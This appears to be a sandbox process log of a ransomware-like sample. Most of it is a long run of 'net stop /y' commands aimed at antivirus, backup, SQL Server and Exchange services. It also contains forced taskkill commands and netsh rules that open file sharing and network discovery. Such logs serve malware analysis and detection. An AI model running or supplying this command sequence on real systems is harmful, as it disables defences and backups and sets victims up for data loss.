C:\Windows\system32\net.exe"net.exe" stop “Sophos MCS Agent” /y3⤵PID:8904
-
-
C:\Windows\system32\net.exe"net.exe" stop AcrSch2Svc /y3⤵PID:9028
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y4⤵PID:10084
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mfemms /y3⤵PID:11212
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfemms /y4⤵PID:4188
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SepMasterService /y3⤵PID:8280
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SepMasterService /y4⤵PID:10116
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$TPSAMA /y3⤵PID:9888
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y4⤵PID:16040
-
-
-
C:\Windows\system32\net.exe"net.exe" stop wbengine /y3⤵PID:10368
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop wbengine /y4⤵PID:10932
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ReportServer$TPS /y3⤵PID:4496
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y4⤵PID:2288
-
-
-
C:\Windows\system32\net.exe"net.exe" stop RESvc /y3⤵PID:11624
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RESvc /y4⤵PID:2056
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y3⤵PID:7856
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y4⤵PID:2176
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y3⤵PID:3904
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y4⤵PID:13664
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ShMonitor /y3⤵PID:13244
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ShMonitor /y4⤵PID:16244
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “intel(r) proset monitoring service” /y3⤵PID:10868
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y4⤵PID:16296
-
-
-
C:\Windows\system32\net.exe"net.exe" stop msexchangeimap4 /y3⤵PID:12408
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y4⤵PID:14628
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mfevtp /y3⤵PID:14772
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfevtp /y4⤵PID:2300
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y3⤵PID:12500
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y4⤵PID:1600
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PROD /y3⤵PID:1592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y4⤵PID:13316
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sms_site_sql_backup /y3⤵PID:15744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y4⤵PID:13720
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos MCS Client” /y3⤵PID:13712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y4⤵PID:13288
-
-
-
C:\Windows\system32\net.exe"net.exe" stop W3Svc /y3⤵PID:12456
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop W3Svc /y4⤵PID:12404
-
-
-
C:\Windows\system32\net.exe"net.exe" stop ARSM /y3⤵PID:14508
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ARSM /y4⤵PID:14044
-
-
-
C:\Windows\system32\net.exe"net.exe" stop Smcinst /y3⤵PID:12128
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Smcinst /y4⤵PID:12412
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y3⤵PID:14464
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y4⤵PID:7268
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeSRS /y3⤵PID:10604
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSExchangeSRS /y4⤵PID:8544
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$BKUPEXEC /y3⤵PID:11052
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y4⤵PID:9956
-
-
-
C:\Windows\system32\net.exe"net.exe" stop unistoresvc_1af40a /y3⤵PID:4432
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:7412
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y4⤵PID:7228
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Health Service” /y3⤵PID:9444
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Health Service” /y4⤵PID:9904
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SmcService /y3⤵PID:2644
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SmcService /y4⤵PID:4880
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SOPHOS /y3⤵PID:4536
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y4⤵PID:11576
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Message Router” /y3⤵PID:11752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y4⤵PID:11376
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$ECWDB2 /y3⤵PID:9360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y4⤵PID:11396
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y3⤵PID:5168
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y4⤵PID:9268
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y3⤵PID:4680
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y4⤵PID:14340
-
-
-
C:\Windows\system32\net.exe"net.exe" stop audioendpointbuilder /y3⤵PID:4784
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y4⤵PID:11040
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sacsvr /y3⤵PID:11544
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sacsvr /y4⤵PID:9252
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SntpService /y3⤵PID:11368
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SntpService /y4⤵PID:9256
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Safestore Service” /y3⤵PID:10992
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Safestore Service” /y4⤵PID:5908
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SBSMONITORING /3⤵PID:11204
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /4⤵PID:7112
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y3⤵PID:4876
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y4⤵PID:11312
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$CXDB /y3⤵PID:10104
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y3⤵PID:14812
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y4⤵PID:12852
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:9348
-
-
-
C:\Windows\system32\net.exe"net.exe" stop sophossps /y3⤵PID:7356
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sophossps /y4⤵PID:11628
-
-
-
C:\Windows\system32\net.exe"net.exe" stop AVP /y3⤵PID:5100
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AVP /y4⤵PID:14604
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SAVAdminService /y3⤵PID:11256
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$ECWDB2 /y3⤵PID:10376
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y4⤵PID:11444
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos System Protection Service” /y3⤵PID:12496
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y4⤵PID:4236
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecVSSProvider /y3⤵PID:12856
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y4⤵PID:4308
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SQL_2008 /y3⤵PID:13884
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y4⤵PID:12460
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecDeviceMediaService /y3⤵PID:12316
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y4⤵PID:4152
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SAVService /y3⤵PID:13848
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVService /y4⤵PID:9240
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SOPHOS /y3⤵PID:13744
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y4⤵PID:9344
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SHAREPOINT /y3⤵PID:14620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y4⤵PID:4644
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y3⤵PID:5148
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y4⤵PID:10876
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y3⤵PID:9304
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y4⤵PID:10400
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos Web Control Service” /y3⤵PID:10844
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4456
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y4⤵PID:11180
-
-
-
C:\Windows\system32\net.exe"net.exe" stop DCAgent /y3⤵PID:10928
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DCAgent /y4⤵PID:11552
-
-
-
C:\Windows\system32\net.exe"net.exe" stop swi_filter /y3⤵PID:9092
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:9380
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_filter /y4⤵PID:12492
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$SQLEXPRESS /y3⤵PID:5076
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecJobEngine /y3⤵PID:12632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y4⤵PID:4824
-
-
-
C:\Windows\system32\net.exe"net.exe" stop svcGenericHost /y3⤵PID:4792
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y4⤵PID:4488
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLTELEMETRY /y3⤵PID:4348
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY /y4⤵PID:4312
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$TPS /y3⤵PID:4996
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y4⤵PID:11064
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PROD /y3⤵PID:12124
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROD /y4⤵PID:12704
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$SBSMONITORING /y3⤵PID:9436
-
-
C:\Windows\system32\net.exe"net.exe" stop TrueKeyServiceHelper /y3⤵PID:12940
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyServiceHelper /y4⤵PID:11116
-
-
-
C:\Windows\system32\net.exe"net.exe" stop swi_service /y3⤵PID:10140
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_service /y4⤵PID:7980
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentBrowser /y3⤵PID:1704
-
-
C:\Windows\system32\net.exe"net.exe" stop AcronisAgent /y3⤵PID:5568
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y4⤵PID:5560
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$TPSAMA /y3⤵PID:6704
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPSAMA /y4⤵PID:7648
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y3⤵PID:6804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y4⤵PID:6692
-
-
-
C:\Windows\system32\net.exe"net.exe" stop swi_update /y3⤵PID:12752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update /y4⤵PID:4156
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecManagementService /y3⤵PID:6872
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y4⤵PID:5484
-
-
-
C:\Windows\system32\net.exe"net.exe" stop WRSVC /y3⤵PID:10700
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop WRSVC /y4⤵PID:11128
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y3⤵PID:13084
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y4⤵PID:6816
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y3⤵PID:5208
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y4⤵PID:14440
-
-
-
C:\Windows\system32\net.exe"net.exe" stop mssql$vim_sqlexp /y3⤵PID:12220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mssql$vim_sqlexp /y4⤵PID:13140
-
-
-
C:\Windows\system32\net.exe"net.exe" stop swi_update_64 /y3⤵PID:14432
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y4⤵PID:15444
-
-
-
C:\Windows\system32\net.exe"net.exe" stop Antivirus /y3⤵PID:14908
-
-
C:\Windows\system32\net.exe"net.exe" stop vapiendpoint /y3⤵PID:3228
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop vapiendpoint /y4⤵PID:15004
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecRPCService /y3⤵PID:12188
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y4⤵PID:10664
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y3⤵PID:5648
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y4⤵PID:15380
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecAgentAccelerator /y3⤵PID:10428
-
-
C:\Windows\system32\net.exe"net.exe" stop TmCCSF /y3⤵PID:5260
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TmCCSF /y4⤵PID:6624
-
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y3⤵PID:10820
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group="File and Printer Sharing" new enable=Yes3⤵PID:16292
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLBrowser /y3⤵PID:12196
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLBrowser /y4⤵PID:13888
-
-
-
C:\Windows\system32\net.exe"net.exe" stop “Sophos File Scanner Service” /y3⤵PID:10340
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamDeploySvc /y3⤵PID:9480
-
-
C:\Windows\system32\net.exe"net.exe" stop msftesql$PROD /y3⤵PID:9508
-
-
C:\Windows\system32\net.exe"net.exe" stop tmlisten /y3⤵PID:5448
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop tmlisten /y4⤵PID:7596
-
-
-
C:\Windows\system32\net.exe"net.exe" stop MSExchangeES /y3⤵PID:14576
-
-
C:\Windows\system32\net.exe"net.exe" stop “SQLsafe Filter Service” /y3⤵PID:8664
-
-
C:\Windows\system32\net.exe"net.exe" stop SMTPSvc /y3⤵PID:4356
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLSafeOLRService /y3⤵PID:12724
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSafeOLRService /y4⤵PID:5608
-
-
-
C:\Windows\system32\net.exe"net.exe" stop VeeamMountSvc /y3⤵PID:8012
-
-
C:\Windows\system32\net.exe"net.exe" stop MSSQLServerADHelper100 /y3⤵PID:5784
-
-
C:\Windows\system32\net.exe"net.exe" stop MsDtsServer110 /y3⤵PID:14700
-
-
C:\Windows\system32\net.exe"net.exe" stop CASAD2DWebSvc /y3⤵PID:8720
-
-
C:\Windows\system32\net.exe"net.exe" stop TrueKey /y3⤵PID:13128
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKey /y4⤵PID:12768
-
-
-
C:\Windows\system32\net.exe"net.exe" stop BackupExecVSSProvider /y3⤵PID:16120
-
-
C:\Windows\system32\net.exe"net.exe" stop mfewc /y3⤵PID:10652
-
-
C:\Windows\system32\net.exe"net.exe" stop McAfeeDLPAgentService /y3⤵PID:12964
-
-
C:\Windows\system32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes3⤵PID:13972
-
-
C:\Windows\system32\net.exe"net.exe" stop SQLSERVERAGENT /y3⤵PID:1404
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SQLSERVERAGENT /y4⤵PID:15012
-
-
-
C:\Windows\system32\net.exe"net.exe" stop TrueKeyScheduler /y3⤵PID:5704
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop TrueKeyScheduler /y4⤵PID:6352
-
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F3⤵
- Kills process with taskkill
PID:13080
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F3⤵PID:6940
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM synctime.exe /F3⤵PID:14888
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mspub.exe /F3⤵
- Kills process with taskkill
PID:7988
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F3⤵PID:6388
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F3⤵PID:5596
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F3⤵PID:12960
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F3⤵PID:8036
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F3⤵PID:5852
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F3⤵PID:14000
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM thebat.exe /F3⤵
- Kills process with taskkill
PID:11832
-
-
C:\Windows\system32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F3⤵PID:7068
-
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y1⤵PID:4728
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Device Control Service” /y1⤵PID:6916
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSExchangeIS /y1⤵PID:5240
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y1⤵PID:6920
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “aphidmonitorservice” /y1⤵PID:2128
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$TPS /y1⤵PID:4352
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SBSMONITORING /1⤵PID:4420
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y1⤵PID:4128
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msexchangeimap4 /y1⤵PID:4144
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y1⤵PID:2416
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop unistoresvc_1af40a /y1⤵PID:15348
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Message Router” /y1⤵PID:15340
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Agent” /y1⤵PID:15332
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophossps /y1⤵PID:15324
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos MCS Client” /y1⤵PID:15308
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_service /y1⤵PID:15300
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SOPHOS /y1⤵PID:15292
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop W3Svc /y1⤵PID:15284
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y1⤵PID:15276
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Web Control Service” /y1⤵PID:15268
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y1⤵PID:15260
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$TPSAMA /y1⤵PID:15252
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y1⤵PID:15236
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SOPHOS /y1⤵PID:15228
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$TPS /y1⤵PID:15220
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop IISAdmin /y1⤵PID:15212
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y1⤵PID:15204
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y1⤵PID:15196
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DCAgent /y1⤵PID:15188
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSOLAP$TPSAMA /y1⤵PID:15180
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SamSs /y1⤵PID:15172
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$TPSAMA /y1⤵PID:15152
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y1⤵PID:15144
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ARSM /y1⤵PID:15136
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop EraserSvc11710 /y1⤵PID:15128
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y1⤵PID:15120
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y1⤵PID:15100
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos System Protection Service” /y1⤵PID:14976
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamMountSvc /y1⤵PID:14968
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop OracleClientCache80 /y1⤵PID:14960
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y1⤵PID:14952
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MySQL57 /y1⤵PID:14944
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfevtp /y1⤵PID:14936
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y1⤵PID:14928
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y1⤵PID:14732
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SepMasterService /y1⤵PID:14724
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AVP /y1⤵PID:14716
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDeviceMediaService /y1⤵PID:14708
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y1⤵PID:14700
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MsDtsServer110 /y2⤵PID:15120
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y1⤵PID:14692
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ReportServer$SQL_2008 /y1⤵PID:14684
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y1⤵PID:14676
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y1⤵PID:4236
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “SQL Backups /y1⤵PID:3092
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y1⤵PID:6024
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROD /y1⤵PID:5000
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfefire /y1⤵PID:4828
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sacsvr /y1⤵PID:14328
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$ECWDB2 /y1⤵PID:14320
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SntpService /y1⤵PID:14312
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_filter /y1⤵PID:14304
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeEngineService /y1⤵PID:14296
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop “Sophos Clean Service” /y1⤵PID:14288
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wbengine /y1⤵PID:14280
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y1⤵PID:14264
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQLServerADHelper100 /y1⤵PID:14256
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sms_site_sql_backup /y1⤵PID:14248
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y1⤵PID:14240
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y1⤵PID:14232
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RESvc /y1⤵PID:14224
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y1⤵PID:14216
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y1⤵PID:14208
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop audioendpointbuilder /y1⤵PID:14200
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop svcGenericHost /y1⤵PID:14192
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Smcinst /y1⤵PID:14184
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y1⤵PID:14176
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop swi_update_64 /y1⤵PID:14168
-
